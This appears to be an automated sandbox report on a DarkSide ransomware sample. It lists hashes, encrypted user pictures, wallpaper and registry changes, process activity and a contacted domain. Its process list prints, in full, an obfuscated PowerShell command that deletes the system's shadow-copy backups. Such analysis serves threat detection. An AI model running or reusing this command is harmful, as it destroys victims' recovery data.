| SHA256 | ffa87a57d8bde50cd0842877894e10f9777a766f925c36297cd4102fee31b98d |
| SHA512 | 24e88cfccdba8e55c21980e0b614e11d33e87bb5841ec6ae35fb64227a15a6dfcad3f4b14c38ec8584f01d280449160937f617ca1d8cdbbaf45a079394b0d9de |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG
| MD5 | 15554c3069a5ab63eca4b4bee420ad11 |
| SHA1 | 6ecdff4345fbd251ccf91889486d0426057627c5 |
| SHA256 | e70e839b4cf998dfa2cd62474c1aca82f998dcc23e6f312189236ddc8fe4983d |
| SHA512 | 25de143dceb4659baf36ab14386427299dc67757298f4f6312a41d080b1d43aae58ab10fa98e2978c2078131171cb87a996c68d85cb81db02f4e9e76cf4650ef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13287626619086400
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13287626619848400
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
C:\Users\Admin\AppData\Local\Temp\075365ae-37de-4c56-b42e-4fed804cdf67.tmp
C:\Users\Admin\AppData\Local\Temp\2bd9593e-631d-4f41-b9e1-62ae67fc52ca.tmp
C:\Users\Admin\AppData\Local\Temp\1448c634-9788-4297-8cfe-538428696765.tmp
C:\Users\Admin\AppData\Local\Temp\d3cb9278-7b02-4be2-b492-56cc5b0c64df.tmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Analysis: behavioral2
Detonation Overview
| Submitted | 2022-01-25 23:22 |
| Reported | 2022-01-25 23:29 |
| Platform | win10-en-20211208 |
| Max time kernel | 121s |
| Max time network | 360s |
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UseCompare.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BlockMount.tiff | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2812 wrote to memory of 3732 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2812 wrote to memory of 3732 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\mal.exe
"C:\Users\Admin\AppData\Local\Temp\mal.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.19:443 | | tcp |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| NL | 67.26.111.254:80 | | tcp |
Files
memory/2812-115-0x0000000000400000-0x000000000083B000-memory.dmp
memory/2812-117-0x0000000000030000-0x0000000000040000-memory.dmp
memory/2812-118-0x0000000000400000-0x000000000083B000-memory.dmp
memory/3732-123-0x0000026698470000-0x0000026698492000-memory.dmp
memory/3732-127-0x0000026698460000-0x0000026698462000-memory.dmp
memory/3732-128-0x0000026698463000-0x0000026698465000-memory.dmp
memory/3732-129-0x0000026698750000-0x00000266987C6000-memory.dmp
memory/3732-141-0x0000026698466000-0x0000026698468000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive